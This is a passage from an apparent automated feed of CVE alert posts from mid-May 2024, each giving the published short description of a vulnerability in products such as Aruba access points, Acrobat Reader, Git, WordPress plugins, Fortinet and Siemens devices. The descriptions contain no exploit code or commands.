🚨 CVE-2023-5938Multiple functions use archives without properly validating the filenames therein, rendering the application vulnerable to path traversal via 'zip slip' attacks.An administrator able to provide tampered archives to be processed by the affected versions of Arc may be able to have arbitrary files extracted to arbitrary filesystem locations. Leveraging this issue, an attacker may be able to overwrite arbitrary files on the target filesystem and cause critical impacts on the system (e.g., arbitrary command execution on the victim’s machine).🎖@cveNotify |
|
| 2024-05-15 17:07:45 |
🚨 CVE-2024-31473There is a command injection vulnerability in the underlying deauthentication service that could lead to unauthenticated remote code execution by sending specially crafted packets destined to the PAPI (Aruba's Access Point management protocol) UDP port (8211). Successful exploitation of this vulnerability results in the ability to execute arbitrary code as a privileged user on the underlying operating system.🎖@cveNotify |
|
| 2024-05-15 17:07:44 |
🚨 CVE-2024-31471There is a command injection vulnerability in the underlying Central Communications service that could lead to unauthenticated remote code execution by sending specially crafted packets destined to the PAPI (Aruba's Access Point management protocol) UDP port (8211). Successful exploitation of this vulnerability results in the ability to execute arbitrary code as a privileged user on the underlying operating system.🎖@cveNotify |
|
| 2024-05-15 17:07:43 |
🚨 CVE-2024-31470There is a buffer overflow vulnerability in the underlying SAE (Simultaneous Authentication of Equals) service that could lead to unauthenticated remote code execution by sending specially crafted packets destined to the PAPI (Aruba's Access Point management protocol) UDP port (8211). Successful exploitation of this vulnerability results in the ability to execute arbitrary code as a privileged user on the underlying operating system.🎖@cveNotify |
|
| 2024-05-15 17:07:40 |
🚨 CVE-2024-31469There are buffer overflow vulnerabilities in the underlying Central Communications service that could lead to unauthenticated remote code execution by sending specially crafted packets destined to the PAPI (Aruba's Access Point management protocol) UDP port (8211). Successful exploitation of these vulnerabilities result in the ability to execute arbitrary code as a privileged user on the underlying operating system.🎖@cveNotify |
|
| 2024-05-15 17:07:39 |
🚨 CVE-2024-31467There are buffer overflow vulnerabilities in the underlying CLI service that could lead to unauthenticated remote code execution by sending specially crafted packets destined to the PAPI (Aruba's Access Point management protocol) UDP port (8211). Successful exploitation of these vulnerabilities result in the ability to execute arbitrary code as a privileged user on the underlying operating system.🎖@cveNotify |
|
| 2024-05-15 17:07:38 |
🚨 CVE-2024-31466There are buffer overflow vulnerabilities in the underlying CLI service that could lead to unauthenticated remote code execution by sending specially crafted packets destined to the PAPI (Aruba's Access Point management protocol) UDP port (8211). Successful exploitation of these vulnerabilities result in the ability to execute arbitrary code as a privileged user on the underlying operating system.🎖@cveNotify |
|
| 2024-05-15 17:07:34 |
🚨 CVE-2023-33327Improper Privilege Management vulnerability in Teplitsa of social technologies Leyka allows Privilege Escalation.This issue affects Leyka: from n/a through 3.30.2.🎖@cveNotify |
|
| 2024-05-15 17:07:33 |
🚨 CVE-2024-4561In WhatsUp Gold versions released before 2023.1.2 , a blind SSRF vulnerability exists in Whatsup Gold's FaviconController that allows an attacker to send arbitrary HTTP requests on behalf of the vulnerable server.🎖@cveNotify |
|
| 2024-05-15 17:07:32 |
🚨 CVE-2024-31556An issue in Reportico Web before v.8.1.0 allows a local attacker to execute arbitrary code and obtain sensitive information via the sessionid function.🎖@cveNotify |
|
| 2024-05-15 17:07:28 |
🚨 CVE-2020-26312Dotmesh is a git-like command-line interface for capturing, organizing and sharing application states. In versions 0.8.1 and prior, the unsafe handling of symbolic links in an unpacking routine may enable attackers to read and/or write to arbitrary locations outside the designated target folder. The routine `untarFile` attempts to guard against creating symbolic links that point outside the directory a tar archive is extracted to. However, a malicious tarball first linking `subdir/parent` to `..` (allowed, because `subdir/..` falls within the archive root) and then linking `subdir/parent/escapes` to `..` results in a symbolic link pointing to the tarball’s parent directory, contrary to the routine’s goals. This issue may lead to arbitrary file write (with same permissions as the program running the unpack operation) if the attacker can control the archive file. Additionally, if the attacker has read access to the unpacked files, they may be able to read arbitrary system files the parent process has permissions to read. As of time of publication, no patch for this issue is available.🎖@cveNotify |
|
| 2024-05-15 17:07:27 |
🚨 CVE-2024-32021Git is a revision control system. Prior to versions 2.45.1, 2.44.1, 2.43.4, 2.42.2, 2.41.1, 2.40.2, and 2.39.4, when cloning a local source repository that contains symlinks via the filesystem, Git may create hardlinks to arbitrary user-readable files on the same filesystem as the target repository in the `objects/` directory. Cloning a local repository over the filesystem may creating hardlinks to arbitrary user-owned files on the same filesystem in the target Git repository's `objects/` directory. When cloning a repository over the filesystem (without explicitly specifying the `file://` protocol or `--no-local`), the optimizations for local cloningwill be used, which include attempting to hard link the object files instead of copying them. While the code includes checks against symbolic links in the source repository, which were added during the fix for CVE-2022-39253, these checks can still be raced because the hard link operation ultimately follows symlinks. If the object on the filesystem appears as a file during the check, and then a symlink during the operation, this will allow the adversary to bypass the check and create hardlinks in the destination objects directory to arbitrary, user-readable files. The problem has been patched in versions 2.45.1, 2.44.1, 2.43.4, 2.42.2, 2.41.1, 2.40.2, and 2.39.4.🎖@cveNotify |
|
| 2024-05-15 17:07:26 |
🚨 CVE-2021-22280Improper DLL loading algorithms in B&R Automation Studio may allow an authenticated local attacker toexecute code with elevated privileges.This issue affects Automation Studio versions before 4.12.🎖@cveNotify |
|
| 2024-05-15 15:38:00 |
🚨 CVE-2024-34955Code-projects Budget Management 1.0 is vulnerable to SQL Injection via the delete parameter.🎖@cveNotify |
|
| 2024-05-15 15:37:59 |
🚨 CVE-2024-34954Code-projects Budget Management 1.0 is vulnerable to Cross Site Scripting (XSS) via the budget parameter.🎖@cveNotify |
|
| 2024-05-15 15:37:58 |
🚨 CVE-2024-25079A memory corruption vulnerability in HddPassword in Insyde InsydeH2O kernel 5.2 before 05.29.09, kernel 5.3 before 05.38.09, kernel 5.4 before 05.46.09, kernel 5.5 before 05.54.09, and kernel 5.6 before 05.61.09 could lead to escalating privileges in SMM.🎖@cveNotify |
|
| 2024-05-15 14:37:24 |
🚨 CVE-2024-25078A memory corruption vulnerability in StorageSecurityCommandDxe in Insyde InsydeH2O before kernel 5.2: IB19130163 in 05.29.07, kernel 5.3: IB19130163 in 05.38.07, kernel 5.4: IB19130163 in 05.46.07, kernel 5.5: IB19130163 in 05.54.07, and kernel 5.6: IB19130163 in 05.61.07 could lead to escalating privileges in SMM.🎖@cveNotify |
|
| 2024-05-15 13:37:28 |
🚨 CVE-2023-6321A command injection vulnerability exists in the IOCTL that manages OTA updates. A specially crafted command can lead to command execution as the root user. An attacker can make authenticated requests to trigger this vulnerability.🎖@cveNotify |
|
| 2024-05-15 11:37:25 |
🚨 CVE-2023-6022Cross-Site Request Forgery (CSRF) in GitHub repository prefecthq/prefect prior to 2.16.5.🎖@cveNotify |
|
| 2024-05-15 10:37:58 |
🚨 CVE-2024-34100Acrobat Reader versions 20.005.30574, 24.002.20736 and earlier are affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2024-05-15 10:37:54 |
🚨 CVE-2024-34098Acrobat Reader versions 20.005.30574, 24.002.20736 and earlier are affected by an Improper Input Validation vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2024-05-15 10:37:53 |
🚨 CVE-2024-34096Acrobat Reader versions 20.005.30574, 24.002.20736 and earlier are affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2024-05-15 10:37:52 |
🚨 CVE-2024-34095Acrobat Reader versions 20.005.30574, 24.002.20736 and earlier are affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2024-05-15 10:37:49 |
🚨 CVE-2024-34094Acrobat Reader versions 20.005.30574, 24.002.20736 and earlier are affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2024-05-15 10:37:48 |
🚨 CVE-2024-30310Acrobat Reader versions 20.005.30574, 24.002.20736 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2024-05-15 10:37:47 |
🚨 CVE-2024-30284Acrobat Reader versions 20.005.30574, 24.002.20736 and earlier are affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2024-05-15 09:37:31 |
🚨 CVE-2024-4010The Email Subscribers by Icegram Express plugin for WordPress is vulnerable to unauthorized access of data, modification of data, and loss of data due to a missing capability check on the handle_ajax_request function in all versions up to, and including, 5.7.19. This makes it possible for authenticated attackers, with subscriber-level access and above, to cause a loss of confidentiality, integrity, and availability, by performing multiple unauthorized actions. Some of these actions could also be leveraged to conduct PHP Object Injection and SQL Injection attacks.🎖@cveNotify |
|
| 2024-05-15 07:37:24 |
🚨 CVE-2024-4636The Image Optimization by Optimole – Lazy Load, CDN, Convert WebP & AVIF plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘allow_meme_types’ function in versions up to, and including, 3.12.10 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-05-15 06:37:37 |
🚨 CVE-2024-3823The Base64 Encoder/Decoder WordPress plugin through 0.9.2 does not have CSRF check when updating its settings, and is missing sanitisation as well as escaping, which could allow attackers to make logged in admin add Stored XSS payloads via a CSRF attack🎖@cveNotify |
|
| 2024-05-15 06:37:36 |
🚨 CVE-2024-3822The Base64 Encoder/Decoder WordPress plugin through 0.9.2 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin🎖@cveNotify |
|
| 2024-05-15 06:37:32 |
🚨 CVE-2024-3748The SP Project & Document Manager WordPress plugin through 4.71 is missing validation in its upload function, allowing a user to manipulate the `user_id` to make it appear that a file was uploaded by another user🎖@cveNotify |
|
| 2024-05-15 06:37:31 |
🚨 CVE-2024-3631The HL Twitter WordPress plugin through 2014.1.18 does not have CSRF check when unlinking twitter accounts, which could allow attackers to make logged in admins perform such actions via a CSRF attack🎖@cveNotify |
|
| 2024-05-15 06:37:30 |
🚨 CVE-2024-3630The HL Twitter WordPress plugin through 2014.1.18 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)🎖@cveNotify |
|
| 2024-05-15 06:37:26 |
🚨 CVE-2024-3548The WP Shortcodes Plugin — Shortcodes Ultimate WordPress plugin before 7.1.2 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin🎖@cveNotify |
|
| 2024-05-15 06:37:25 |
🚨 CVE-2024-3406The WP Prayer WordPress plugin through 2.0.9 does not have CSRF check in place when updating its email settings, which could allow attackers to make a logged in admin change them via a CSRF attack🎖@cveNotify |
|
| 2024-05-15 06:37:24 |
🚨 CVE-2024-3405The WP Prayer WordPress plugin through 2.0.9 does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack🎖@cveNotify |
|
| 2024-05-15 05:37:24 |
🚨 CVE-2024-1459A path traversal vulnerability was found in Undertow. This issue may allow a remote attacker to append a specially-crafted sequence to an HTTP request for an application deployed to JBoss EAP, which may permit access to privileged or restricted files and directories.🎖@cveNotify |
|
| 2024-05-15 03:37:27 |
🚨 CVE-2024-4894ITPison OMICARD EDM fails to properly filter specific URL parameter, allowing unauthenticated remote attackers to modify the parameters and conduct Server-Side Request Forgery (SSRF) attacks. This vulnerability enables attackers to probe internal network information.🎖@cveNotify |
|
| 2024-05-15 03:37:26 |
🚨 CVE-2024-4893DigiWin EasyFlow .NET lacks validation for certain input parameters, allowing remote attackers to inject arbitrary SQL commands. This vulnerability enables unauthorized access to read, modify, and delete database records, as well as execute system commands.🎖@cveNotify |
|
| 2024-05-15 03:37:25 |
🚨 CVE-2024-32888The Amazon JDBC Driver for Redshift is a Type 4 JDBC driver that provides database connectivity through the standard JDBC application program interfaces (APIs) available in the Java Platform, Enterprise Editions. Prior to version 2.1.0.28, SQL injection is possible when using the non-default connection property `preferQueryMode=simple` in combination with application code which has a vulnerable SQL that negates a parameter value. There is no vulnerability in the driver when using the default, extended query mode. Note that `preferQueryMode` is not a supported parameter in Redshift JDBC driver, and is inherited code from Postgres JDBC driver. Users who do not override default settings to utilize this unsupported query mode are not affected. This issue is patched in driver version 2.1.0.28. As a workaround, do not use the connection property `preferQueryMode=simple`. (NOTE: Those who do not explicitly specify a query mode use the default of extended query mode and are not affected by this issue.)🎖@cveNotify |
|
| 2024-05-15 02:37:31 |
🚨 CVE-2024-4847The Alt Text AI – Automatically generate image alt text for SEO and accessibility plugin for WordPress is vulnerable to generic SQL Injection via the ‘last_post_id’ parameter in all versions up to, and including, 1.4.9 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.🎖@cveNotify |
|
| 2024-05-15 02:37:30 |
🚨 CVE-2024-4656The Import and export users and customers plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the user agent header in all versions up to, and including, 1.26.6.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator access and higher, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-05-15 02:37:26 |
🚨 CVE-2024-4373The Sina Extension for Elementor (Slider, Gallery, Form, Modal, Data Table, Tab, Particle, Free Elementor Widgets & Elementor Templates) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Sina Particle Layer widget in all versions up to, and including, 3.5.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-05-15 02:37:25 |
🚨 CVE-2024-35109idccms v1.35 was discovered to contain a Cross-Site Request Forgery (CSRF) via the component /homePro_deal.php?mudi=add&nohrefStr=close.🎖@cveNotify |
|
| 2024-05-15 02:37:24 |
🚨 CVE-2024-35108idccms v1.35 was discovered to contain a Cross-Site Request Forgery (CSRF) via the component /admin/homePro_deal.php?mudi=del&dataType=&dataTypeCN.🎖@cveNotify |
|
| 2024-05-15 01:37:24 |
🚨 CVE-2024-3744A security issue was discovered in azure-file-csi-driver where an actor with access to the driver logs could observe service account tokens. These tokens could then potentially be exchanged with external cloud providers to access secrets stored in cloud vault solutions. Tokens are only logged when TokenRequests is configured in the CSIDriver object and the driver is set to run at log level 2 or greater via the -v flag.🎖@cveNotify |
|
| 2024-05-15 01:07:25 |
🚨 CVE-2024-30040Windows MSHTML Platform Security Feature Bypass Vulnerability🎖@cveNotify |
|
| 2024-05-15 01:07:24 |
🚨 CVE-2024-4671Use after free in Visuals in Google Chrome prior to 124.0.6367.201 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2024-05-15 00:37:45 |
🚨 CVE-2024-4363The Visual Portfolio, Photo Gallery & Post Grid plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘title_tag’ parameter in all versions up to, and including, 3.3.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-05-15 00:37:44 |
🚨 CVE-2024-0437The Password Protected – Ultimate Plugin to Password Protect Your WordPress Content with Ease plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.6.6 via the API. This makes it possible for authenticated attackers, with subscriber access or higher, to extract post titles and content, thus bypassing the plugin's password protection.🎖@cveNotify |
|
| 2024-05-14 23:37:42 |
🚨 CVE-2024-4666The Borderless – Widgets, Elements, Templates and Toolkit for Elementor & Gutenberg plugin for WordPress is vulnerable to Stored Cross-Site Scripting via multiple widgets in all versions up to, and including, 1.5.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-05-14 23:37:41 |
🚨 CVE-2024-31482An unauthenticated Denial-of-Service (DoS) vulnerability exists in the ANSI escape code service accessed via the PAPI protocol. Successful exploitation of this vulnerability results in the ability to interrupt the normal operation of the affected Access Point.🎖@cveNotify |
|
| 2024-05-14 23:37:37 |
🚨 CVE-2024-31480Unauthenticated Denial of Service (DoS) vulnerabilities exist in the CLI service accessed via the PAPI protocol. Successful exploitation of these vulnerabilities result in the ability to interrupt the normal operation of the affected service.🎖@cveNotify |
|
| 2024-05-14 23:37:36 |
🚨 CVE-2024-31477Multiple authenticated command injection vulnerabilities exist in the command line interface. Successful exploitation of these vulnerabilities result in the ability to execute arbitrary commands as a privileged user on the underlying operating system.🎖@cveNotify |
|
| 2024-05-14 23:37:31 |
🚨 CVE-2024-31475There is an arbitrary file deletion vulnerability in the Central Communications service accessed by PAPI (Aruba's access point management protocol). Successful exploitation of this vulnerability results in the ability to delete arbitrary files on the underlying operating system, which could lead to the ability to interrupt normal operation and impact the integrity of the affected Access Point.🎖@cveNotify |
|
| 2024-05-14 23:37:30 |
🚨 CVE-2024-31472There are command injection vulnerabilities in the underlying Soft AP Daemon service that could lead to unauthenticated remote code execution by sending specially crafted packets destined to the PAPI (Aruba's Access Point management protocol) UDP port (8211). Successful exploitation of these vulnerabilities result in the ability to execute arbitrary code as a privileged user on the underlying operating system.🎖@cveNotify |
|
| 2024-05-14 23:37:26 |
🚨 CVE-2024-31470There is a buffer overflow vulnerability in the underlying SAE (Simultaneous Authentication of Equals) service that could lead to unauthenticated remote code execution by sending specially crafted packets destined to the PAPI (Aruba's Access Point management protocol) UDP port (8211). Successful exploitation of this vulnerability results in the ability to execute arbitrary code as a privileged user on the underlying operating system.🎖@cveNotify |
|
| 2024-05-14 23:37:25 |
🚨 CVE-2024-31468There are buffer overflow vulnerabilities in the underlying Central Communications service that could lead to unauthenticated remote code execution by sending specially crafted packets destined to the PAPI (Aruba's Access Point management protocol) UDP port (8211). Successful exploitation of these vulnerabilities result in the ability to execute arbitrary code as a privileged user on the underlying operating system.🎖@cveNotify |
|
| 2024-05-14 23:37:24 |
🚨 CVE-2024-31467There are buffer overflow vulnerabilities in the underlying CLI service that could lead to unauthenticated remote code execution by sending specially crafted packets destined to the PAPI (Aruba's Access Point management protocol) UDP port (8211). Successful exploitation of these vulnerabilities result in the ability to execute arbitrary code as a privileged user on the underlying operating system.🎖@cveNotify |
|
| 2024-05-14 22:37:25 |
🚨 CVE-2024-31466There are buffer overflow vulnerabilities in the underlying CLI service that could lead to unauthenticated remote code execution by sending specially crafted packets destined to the PAPI (Aruba's Access Point management protocol) UDP port (8211). Successful exploitation of these vulnerabilities result in the ability to execute arbitrary code as a privileged user on the underlying operating system.🎖@cveNotify |
|
| 2024-05-14 22:37:24 |
🚨 CVE-2023-33327Improper Privilege Management vulnerability in Teplitsa of social technologies Leyka allows Privilege Escalation.This issue affects Leyka: from n/a through 3.30.2.🎖@cveNotify |
|
| 2024-05-14 20:37:31 |
🚨 CVE-2024-32465Git is a revision control system. The Git project recommends to avoid working in untrusted repositories, and instead to clone it first with `git clone --no-local` to obtain a clean copy. Git has specific protections to make that a safe operation even with an untrusted source repository, but vulnerabilities allow those protections to be bypassed. In the context of cloning local repositories owned by other users, this vulnerability has been covered in CVE-2024-32004. But there are circumstances where the fixes for CVE-2024-32004 are not enough: For example, when obtaining a `.zip` file containing a full copy of a Git repository, it should not be trusted by default to be safe, as e.g. hooks could be configured to run within the context of that repository. The problem has been patched in versions 2.45.1, 2.44.1, 2.43.4, 2.42.2, 2.41.1, 2.40.2, and 2.39.4. As a workaround, avoid using Git in repositories that have been obtained via archives from untrusted sources.🎖@cveNotify |
|
| 2024-05-14 20:37:30 |
🚨 CVE-2024-32021Git is a revision control system. Prior to versions 2.45.1, 2.44.1, 2.43.4, 2.42.2, 2.41.1, 2.40.2, and 2.39.4, when cloning a local source repository that contains symlinks via the filesystem, Git may create hardlinks to arbitrary user-readable files on the same filesystem as the target repository in the `objects/` directory. Cloning a local repository over the filesystem may creating hardlinks to arbitrary user-owned files on the same filesystem in the target Git repository's `objects/` directory. When cloning a repository over the filesystem (without explicitly specifying the `file://` protocol or `--no-local`), the optimizations for local cloningwill be used, which include attempting to hard link the object files instead of copying them. While the code includes checks against symbolic links in the source repository, which were added during the fix for CVE-2022-39253, these checks can still be raced because the hard link operation ultimately follows symlinks. If the object on the filesystem appears as a file during the check, and then a symlink during the operation, this will allow the adversary to bypass the check and create hardlinks in the destination objects directory to arbitrary, user-readable files. The problem has been patched in versions 2.45.1, 2.44.1, 2.43.4, 2.42.2, 2.41.1, 2.40.2, and 2.39.4.🎖@cveNotify |
|
| 2024-05-14 20:37:26 |
🚨 CVE-2021-36389In Yellowfin before 9.6.1 it is possible to enumerate and download uploaded images through an Insecure Direct Object Reference vulnerability exploitable by sending a specially crafted HTTP GET request to the page "MIImage.i4".🎖@cveNotify |
|
| 2024-05-14 20:37:25 |
🚨 CVE-2020-12103In Tiny File Manager 2.4.1 there is a vulnerability in the ajax file backup copy functionality which allows authenticated users to create backup copies of files (with .bak extension) outside the scope in the same directory in which they are stored.🎖@cveNotify |
|
| 2024-05-14 20:37:24 |
🚨 CVE-2020-12102In Tiny File Manager 2.4.1, there is a Path Traversal vulnerability in the ajax recursive directory listing functionality. This allows authenticated users to enumerate directories and files on the filesystem (outside of the application scope).🎖@cveNotify |
|
| 2024-05-14 19:37:25 |
🚨 CVE-2023-35841Exposed IOCTL with Insufficient Access Control in Phoenix WinFlash Driver on Windows allows Privilege Escalation which allows for modification of system firmware.This issue affects WinFlash Driver: before 4.5.0.0.🎖@cveNotify |
|
| 2024-05-14 18:37:25 |
🚨 CVE-2024-27110Elevation of privilege vulnerability in GE HealthCare EchoPAC products🎖@cveNotify |
|
| 2024-05-14 17:37:44 |
🚨 CVE-2024-29996Windows Common Log File System Driver Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2024-05-14 17:37:43 |
🚨 CVE-2024-27109Insufficiently protected credentials in GE HealthCare EchoPAC products🎖@cveNotify |
|
| 2024-05-14 17:37:42 |
🚨 CVE-2024-27107Weak account password in GE HealthCare EchoPAC products🎖@cveNotify |
|
| 2024-05-14 17:37:38 |
🚨 CVE-2024-27106Vulnerable data in transit in GE HealthCare EchoPAC products🎖@cveNotify |
|
| 2024-05-14 17:37:37 |
🚨 CVE-2024-23105A Use Of Less Trusted Source [CWE-348] vulnerability in Fortinet FortiPortal version 7.0.0 through 7.0.6 and version 7.2.0 through 7.2.1 allows an unauthenticated attack to bypass IP protection through crafted HTTP or HTTPS packets.🎖@cveNotify |
|
| 2024-05-14 17:37:36 |
🚨 CVE-2024-1630Path traversal vulnerability in “getAllFolderContents” function of Common Service Desktop, a GE HealthCare ultrasound device component🎖@cveNotify |
|
| 2024-05-14 17:37:32 |
🚨 CVE-2023-50180An exposure of sensitive system information to an unauthorized control sphere vulnerability [CWE-497] in FortiADC version 7.4.1 and below, version 7.2.3 and below, version 7.1.4 and below, version 7.0.5 and below, version 6.2.6 and below may allow a read-only admin to view data pertaining to other admins.🎖@cveNotify |
|
| 2024-05-14 17:37:31 |
🚨 CVE-2023-45586An insufficient verification of data authenticity vulnerability [CWE-345] in Fortinet FortiOS SSL-VPN tunnel mode version 7.4.0 through 7.4.1, version 7.2.0 through 7.2.7 and before 7.0.12 & FortiProxy SSL-VPN tunnel mode version 7.4.0 through 7.4.1, version 7.2.0 through 7.2.7 and before 7.0.13 allows an authenticated VPN user to send (but not receive) packets spoofing the IP of another user via crafted network packets.🎖@cveNotify |
|
| 2024-05-14 17:37:30 |
🚨 CVE-2023-45583A use of externally-controlled format string in Fortinet FortiProxy versions 7.2.0 through 7.2.5, 7.0.0 through 7.0.11, 2.0.0 through 2.0.13, 1.2.0 through 1.2.13, 1.1.0 through 1.1.6 FortiPAM versions 1.1.0, 1.0.0 through 1.0.3 FortiOS versions 7.4.0, 7.2.0 through 7.2.5, 7.0.0 through 7.0.13, 6.4.0 through 6.4.14, 6.2.0 through 6.2.15 FortiSwitchManager versions 7.2.0 through 7.2.2, 7.0.0 through 7.0.2 allows attacker to execute unauthorized code or commands via specially crafted cli commands and http requests.🎖@cveNotify |
|
| 2024-05-14 17:37:26 |
🚨 CVE-2023-40720An authorization bypass through user-controlled key vulnerability [CWE-639] in FortiVoiceEntreprise version 7.0.0 through 7.0.1 and before 6.4.8 allows an authenticated attacker to read the SIP configuration of other users via crafted HTTP or HTTPS requests.🎖@cveNotify |
|
| 2024-05-14 17:37:25 |
🚨 CVE-2023-36640A use of externally-controlled format string in Fortinet FortiProxy versions 7.2.0 through 7.2.4, 7.0.0 through 7.0.10, 2.0.0 through 2.0.13, 1.2.0 through 1.2.13, 1.1.0 through 1.1.6, 1.0.0 through 1.0.7, FortiPAM versions 1.0.0 through 1.0.3, FortiOS versions 7.2.0, 7.0.0 through 7.0.12, 6.4.0 through 6.4.14, 6.2.0 through 6.2.15, 6.0.0 through 6.0.16 allows attacker to execute unauthorized code or commands via specially crafted commands🎖@cveNotify |
|
| 2024-05-14 16:37:30 |
🚨 CVE-2019-19300A vulnerability has been identified in Development/Evaluation Kits for PROFINET IO: EK-ERTEC 200, Development/Evaluation Kits for PROFINET IO: EK-ERTEC 200P, KTK ATE530S, SIDOOR ATD430W, SIDOOR ATE530S COATED, SIDOOR ATE531S, SIMATIC ET 200pro IM154-8 PN/DP CPU (6ES7154-8AB01-0AB0), SIMATIC ET 200pro IM154-8F PN/DP CPU (6ES7154-8FB01-0AB0), SIMATIC ET 200pro IM154-8FX PN/DP CPU (6ES7154-8FX00-0AB0), SIMATIC ET 200S IM151-8 PN/DP CPU (6ES7151-8AB01-0AB0), SIMATIC ET 200S IM151-8F PN/DP CPU (6ES7151-8FB01-0AB0), SIMATIC ET 200SP Open Controller CPU 1515SP PC (incl. SIPLUS variants), SIMATIC ET 200SP Open Controller CPU 1515SP PC2 (incl. SIPLUS variants), SIMATIC ET200AL IM157-1 PN, SIMATIC ET200ecoPN, AI 8xRTD/TC, M12-L (6ES7144-6JF00-0BB0), SIMATIC ET200ecoPN, CM 4x IO-Link, M12-L (6ES7148-6JE00-0BB0), SIMATIC ET200ecoPN, CM 8x IO-Link, M12-L (6ES7148-6JG00-0BB0), SIMATIC ET200ecoPN, CM 8x IO-Link, M12-L (6ES7148-6JJ00-0BB0), SIMATIC ET200ecoPN, DI 16x24VDC, M12-L (6ES7141-6BH00-0BB0), SIMATIC ET200ecoPN, DI 8x24VDC, M12-L (6ES7141-6BG00-0BB0), SIMATIC ET200ecoPN, DIQ 16x24VDC/2A, M12-L (6ES7143-6BH00-0BB0), SIMATIC ET200ecoPN, DQ 8x24VDC/0,5A, M12-L (6ES7142-6BG00-0BB0), SIMATIC ET200ecoPN, DQ 8x24VDC/2A, M12-L (6ES7142-6BR00-0BB0), SIMATIC ET200MP IM155-5 PN HF (incl. SIPLUS variants), SIMATIC ET200SP IM155-6 MF HF, SIMATIC ET200SP IM155-6 PN HA (incl. SIPLUS variants), SIMATIC ET200SP IM155-6 PN HF (incl. SIPLUS variants), SIMATIC ET200SP IM155-6 PN/2 HF (incl. SIPLUS variants), SIMATIC ET200SP IM155-6 PN/3 HF (incl. SIPLUS variants), SIMATIC MICRO-DRIVE PDC, SIMATIC PN/MF Coupler (6ES7158-3MU10-0XA0), SIMATIC PN/PN Coupler (6ES7158-3AD10-0XA0), SIMATIC S7-1200 CPU family (incl. SIPLUS variants), SIMATIC S7-1500 CPU family (incl. related ET200 CPUs and SIPLUS variants), SIMATIC S7-1500 Software Controller, SIMATIC S7-300 CPU 314C-2 PN/DP (6ES7314-6EH04-0AB0), SIMATIC S7-300 CPU 315-2 PN/DP (6ES7315-2EH14-0AB0), SIMATIC S7-300 CPU 315F-2 PN/DP (6ES7315-2FJ14-0AB0), SIMATIC S7-300 CPU 315T-3 PN/DP (6ES7315-7TJ10-0AB0), SIMATIC S7-300 CPU 317-2 PN/DP (6ES7317-2EK14-0AB0), SIMATIC S7-300 CPU 317F-2 PN/DP (6ES7317-2FK14-0AB0), SIMATIC S7-300 CPU 317T-3 PN/DP (6ES7317-7TK10-0AB0), SIMATIC S7-300 CPU 317TF-3 PN/DP (6ES7317-7UL10-0AB0), SIMATIC S7-300 CPU 319-3 PN/DP (6ES7318-3EL01-0AB0), SIMATIC S7-300 CPU 319F-3 PN/DP (6ES7318-3FL01-0AB0), SIMATIC S7-400 H V6 CPU family and below (incl. SIPLUS variants), SIMATIC S7-400 PN/DP V7 CPU family (incl. SIPLUS variants), SIMATIC S7-410 V10 CPU family (incl. SIPLUS variants), SIMATIC S7-410 V8 CPU family (incl. SIPLUS variants), SIMATIC TDC CP51M1, SIMATIC TDC CPU555, SIMATIC WinAC RTX 2010 (6ES7671-0RC08-0YA0), SIMATIC WinAC RTX F 2010 (6ES7671-1RC08-0YA0), SINAMICS S/G Control Unit w. PROFINET, SIPLUS ET 200S IM151-8 PN/DP CPU (6AG1151-8AB01-7AB0), SIPLUS ET 200S IM151-8F PN/DP CPU (6AG1151-8FB01-2AB0), SIPLUS NET PN/PN Coupler (6AG2158-3AD10-4XA0), SIPLUS S7-300 CPU 314C-2 PN/DP (6AG1314-6EH04-7AB0), SIPLUS S7-300 CPU 315-2 PN/DP (6AG1315-2EH14-7AB0), SIPLUS S7-300 CPU 315F-2 PN/DP (6AG1315-2FJ14-2AB0), SIPLUS S7-300 CPU 